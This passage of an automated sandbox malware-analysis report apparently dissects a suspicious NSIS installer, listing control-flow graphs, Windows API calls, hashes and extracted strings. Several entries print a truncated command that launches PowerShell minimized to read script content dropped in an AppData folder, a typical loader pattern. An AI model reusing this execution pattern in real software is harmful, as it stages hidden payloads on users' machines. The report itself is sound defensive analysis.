                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: &B
                                                  • API String ID: 3282139019-3208460036
                                                  • Opcode ID: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                  • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                                  • Opcode Fuzzy Hash: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                  • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 285 403863-40387b call 4063f4 288 40387d-40388d call 405f61 285->288 289 40388f-4038c6 call 405ee7 285->289 298 4038e9-403912 call 403b39 call 405ad6 288->298 294 4038c8-4038d9 call 405ee7 289->294 295 4038de-4038e4 lstrcatW 289->295 294->295 295->298 303 4039a4-4039ac call 405ad6 298->303 304 403918-40391d 298->304 310 4039ba-4039df LoadImageW 303->310 311 4039ae-4039b5 call 40603c 303->311 304->303 306 403923-40394b call 405ee7 304->306 306->303 312 40394d-403951 306->312 314 403a60-403a68 call 40140b 310->314 315 4039e1-403a11 RegisterClassW 310->315 311->310 316 403963-40396f lstrlenW 312->316 317 403953-403960 call 4059fb 312->317 328 403a72-403a7d call 403b39 314->328 329 403a6a-403a6d 314->329 318 403a17-403a5b SystemParametersInfoW CreateWindowExW 315->318 319 403b2f 315->319 323 403971-40397f lstrcmpiW 316->323 324 403997-40399f call 4059ce call 40601a 316->324 317->316 318->314 322 403b31-403b38 319->322 323->324 327 403981-40398b GetFileAttributesW 323->327 324->303 331 403991-403992 call 405a1a 327->331 332 40398d-40398f 327->332 338 403a83-403a9d ShowWindow call 406384 328->338 339 403b06-403b07 call 40524c 328->339 329->322 331->324 332->324 332->331 344 403aa9-403abb GetClassInfoW 338->344 345 403a9f-403aa4 call 406384 338->345 343 403b0c-403b0e 339->343 346 403b10-403b16 343->346 347 403b28-403b2a call 40140b 343->347 350 403ad3-403af6 DialogBoxParamW call 40140b 344->350 351 403abd-403acd GetClassInfoW RegisterClassW 344->351 345->344 346->329 352 403b1c-403b23 call 40140b 346->352 347->319 356 403afb-403b04 call 4037b3 350->356 351->350 352->329 356->322
                                                  APIs
                                                    • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                    • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                  • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,76CF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x295IO8kqM.exe",00000000), ref: 004038E4
                                                  • lstrlenW.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Roaming\woady\roadshow,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,76CF3420), ref: 00403964
                                                  • lstrcmpiW.KERNEL32(?,.exe,Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Roaming\woady\roadshow,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                  • GetFileAttributesW.KERNEL32(Execute: ), ref: 00403982
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\woady\roadshow), ref: 004039CB
                                                    • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                  • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                  • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                  • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\x295IO8kqM.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\woady\roadshow$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                  • API String ID: 1975747703-3296195131
                                                  • Opcode ID: 4ab84f4992c1089612af3063813e9a7832d91dbd10b28a047dcb676307e9da9d
                                                  • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                                  • Opcode Fuzzy Hash: 4ab84f4992c1089612af3063813e9a7832d91dbd10b28a047dcb676307e9da9d
                                                  • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 359 402dee-402e3c GetTickCount GetModuleFileNameW call 405bef 362 402e48-402e76 call 40601a call 405a1a call 40601a GetFileSize 359->362 363 402e3e-402e43 359->363 371 402f63-402f71 call 402d8a 362->371 372 402e7c 362->372 364 403020-403024 363->364 379 402f73-402f76 371->379 380 402fc6-402fcb 371->380 374 402e81-402e98 372->374 376 402e9a 374->376 377 402e9c-402ea5 call 40320c 374->377 376->377 384 402eab-402eb2 377->384 385 402fcd-402fd5 call 402d8a 377->385 382 402f78-402f90 call 403222 call 40320c 379->382 383 402f9a-402fc4 GlobalAlloc call 403222 call 403027 379->383 380->364 382->380 405 402f92-402f98 382->405 383->380 410 402fd7-402fe8 383->410 389 402eb4-402ec8 call 405baa 384->389 390 402f2e-402f32 384->390 385->380 395 402f3c-402f42 389->395 408 402eca-402ed1 389->408 394 402f34-402f3b call 402d8a 390->394 390->395 394->395 401 402f51-402f5b 395->401 402 402f44-402f4e call 4064a5 395->402 401->374 409 402f61 401->409 402->401 405->380 405->383 408->395 412 402ed3-402eda 408->412 409->371 413 402ff0-402ff5 410->413 414 402fea 410->414 412->395 416 402edc-402ee3 412->416 415 402ff6-402ffc 413->415 414->413 415->415 417 402ffe-403019 SetFilePointer call 405baa 415->417 416->395 418 402ee5-402eec 416->418 421 40301e 417->421 418->395 420 402eee-402f0e 418->420 420->380 422 402f14-402f18 420->422 421->364 423 402f20-402f28 422->423 424 402f1a-402f1e 422->424 423->395 425 402f2a-402f2c 423->425 424->409 424->423 425->395
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DFF
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00402E1B
                                                    • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405BF3
                                                    • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405C15
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00402E67
                                                  Strings
                                                  • Null, xrefs: 00402EE5
                                                  • Error launching installer, xrefs: 00402E3E
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                  • Inst, xrefs: 00402ED3
                                                  • "C:\Users\user\Desktop\x295IO8kqM.exe", xrefs: 00402DEE
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                  • soft, xrefs: 00402EDC
                                                  • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\x295IO8kqM.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 4283519449-103354882
                                                  • Opcode ID: 53a79ab10754b30072a285aae5e63ccf25b493d98f7d181817180c82abba2fcf
                                                  • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                                  • Opcode Fuzzy Hash: 53a79ab10754b30072a285aae5e63ccf25b493d98f7d181817180c82abba2fcf
                                                  • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 426 40603c-406047 427 406049-406058 426->427 428 40605a-406070 426->428 427->428 429 406076-406083 428->429 430 406288-40628e 428->430 429->430 433 406089-406090 429->433 431 406294-40629f 430->431 432 406095-4060a2 430->432 435 4062a1-4062a5 call 40601a 431->435 436 4062aa-4062ab 431->436 432->431 434 4060a8-4060b4 432->434 433->430 437 406275 434->437 438 4060ba-4060f6 434->438 435->436 440 406283-406286 437->440 441 406277-406281 437->441 442 406216-40621a 438->442 443 4060fc-406107 GetVersion 438->443 440->430 441->430 446 40621c-406220 442->446 447 40624f-406253 442->447 444 406121 443->444 445 406109-40610d 443->445 451 406128-40612f 444->451 445->444 448 40610f-406113 445->448 449 406230-40623d call 40601a 446->449 450 406222-40622e call 405f61 446->450 452 406262-406273 lstrlenW 447->452 453 406255-40625d call 40603c 447->453 448->444 455 406115-406119 448->455 464 406242-40624b 449->464 450->464 457 406131-406133 451->457 458 406134-406136 451->458 452->430 453->452 455->444 460 40611b-40611f 455->460 457->458 462 406172-406175 458->462 463 406138-406155 call 405ee7 458->463 460->451 465 406185-406188 462->465 466 406177-406183 GetSystemDirectoryW 462->466 472 40615a-40615e 463->472 464->452 468 40624d 464->468 470 4061f3-4061f5 465->470 471 40618a-406198 GetWindowsDirectoryW 465->471 469 4061f7-4061fb 466->469 473 40620e-406214 call 4062ae 468->473 469->473 474 4061fd-406201 469->474 470->469 476 40619a-4061a4 470->476 471->470 472->474 477 406164-40616d call 40603c 472->477 473->452 474->473 479 406203-406209 lstrcatW 474->479 481 4061a6-4061a9 476->481 482 4061be-4061d4 SHGetSpecialFolderLocation 476->482 477->469 479->473 481->482 484 4061ab-4061b2 481->484 485 4061d6-4061ed SHGetPathFromIDListW CoTaskMemFree 482->485 486 4061ef 482->486 487 4061ba-4061bc 484->487 485->469 485->486 486->470 487->469 487->482
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,?,004051B0,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,00000000,0040FEA0), ref: 004060FF
                                                  • GetSystemDirectoryW.KERNEL32(Execute: ,00000400), ref: 0040617D
                                                  • GetWindowsDirectoryW.KERNEL32(Execute: ,00000400), ref: 00406190
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                  • SHGetPathFromIDListW.SHELL32(?,Execute: ), ref: 004061DA
                                                  • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                  • lstrcatW.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                  • lstrlenW.KERNEL32(Execute: ,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,?,004051B0,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,00000000,0040FEA0), ref: 00406263
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Execute: $Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-3861743816
                                                  • Opcode ID: 52b5c989bfcfa41031e69e9bc1b01fc817c5fcaa4102b2eac78cc44a12febbb5
                                                  • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                                  • Opcode Fuzzy Hash: 52b5c989bfcfa41031e69e9bc1b01fc817c5fcaa4102b2eac78cc44a12febbb5
                                                  • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 401767-40178c call 402bbf call 405a45 493 401796-4017a8 call 40601a call 4059ce lstrcatW 488->493 494 40178e-401794 call 40601a 488->494 499 4017ad-4017ae call 4062ae 493->499 494->499 503 4017b3-4017b7 499->503 504 4017b9-4017c3 call 40635d 503->504 505 4017ea-4017ed 503->505 512 4017d5-4017e7 504->512 513 4017c5-4017d3 CompareFileTime 504->513 506 4017f5-401811 call 405bef 505->506 507 4017ef-4017f0 call 405bca 505->507 515 401813-401816 506->515 516 401885-4018ae call 405179 call 403027 506->516 507->506 512->505 513->512 517 401867-401871 call 405179 515->517 518 401818-401856 call 40601a * 2 call 40603c call 40601a call 40575f 515->518 528 4018b0-4018b4 516->528 529 4018b6-4018c2 SetFileTime 516->529 530 40187a-401880 517->530 518->503 550 40185c-40185d 518->550 528->529 532 4018c8-4018d3 CloseHandle 528->532 529->532 533 402a55 530->533 537 4018d9-4018dc 532->537 538 402a4c-402a4f 532->538 536 402a57-402a5b 533->536 540 4018f1-4018f4 call 40603c 537->540 541 4018de-4018ef call 40603c lstrcatW 537->541 538->533 547 4018f9-40228d call 40575f 540->547 541->547 547->536 547->538 550->530 552 40185f-401860 550->552 552->517
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,"Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.U,C:\Users\user\AppData\Roaming\woady\roadshow,?,?,00000031), ref: 004017A8
                                                  • CompareFileTime.KERNEL32(-00000014,?,"Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.U,"Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.U,00000000,00000000,"Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.U,C:\Users\user\AppData\Roaming\woady\roadshow,?,?,00000031), ref: 004017CD
                                                    • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                    • Part of subcall function 00405179: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                    • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                    • Part of subcall function 00405179: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00403160,00403160,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000), ref: 004051D4
                                                    • Part of subcall function 00405179: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl), ref: 004051E6
                                                    • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                    • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                    • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.U$C:\Users\user\AppData\Roaming\woady\roadshow$C:\Windows\Fonts\blgeturbulensen\stetikker
                                                  • API String ID: 1941528284-2090315455
                                                  • Opcode ID: 51f279480f68cc7e10e741542696f9041adccf7c97a6eb727ffe1accfb78dd87
                                                  • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                                  • Opcode Fuzzy Hash: 51f279480f68cc7e10e741542696f9041adccf7c97a6eb727ffe1accfb78dd87
                                                  • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 554 405179-40518e 555 405194-4051a5 554->555 556 405245-405249 554->556 557 4051b0-4051bc lstrlenW 555->557 558 4051a7-4051ab call 40603c 555->558 560 4051d9-4051dd 557->560 561 4051be-4051ce lstrlenW 557->561 558->557 563 4051ec-4051f0 560->563 564 4051df-4051e6 SetWindowTextW 560->564 561->556 562 4051d0-4051d4 lstrcatW 561->562 562->560 565 4051f2-405234 SendMessageW * 3 563->565 566 405236-405238 563->566 564->563 565->566 566->556 567 40523a-40523d 566->567 567->556
                                                  APIs
                                                  • lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                  • lstrlenW.KERNEL32(00403160,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                  • lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00403160,00403160,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000), ref: 004051D4
                                                  • SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl), ref: 004051E6
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl
                                                  • API String ID: 2531174081-2596124352
                                                  • Opcode ID: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                  • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                                  • Opcode Fuzzy Hash: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                  • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 568 406384-4063a4 GetSystemDirectoryW 569 4063a6 568->569 570 4063a8-4063aa 568->570 569->570 571 4063bb-4063bd 570->571 572 4063ac-4063b5 570->572 574 4063be-4063f1 wsprintfW LoadLibraryExW 571->574 572->571 573 4063b7-4063b9 572->573 573->574
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                  • wsprintfW.USER32 ref: 004063D6
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
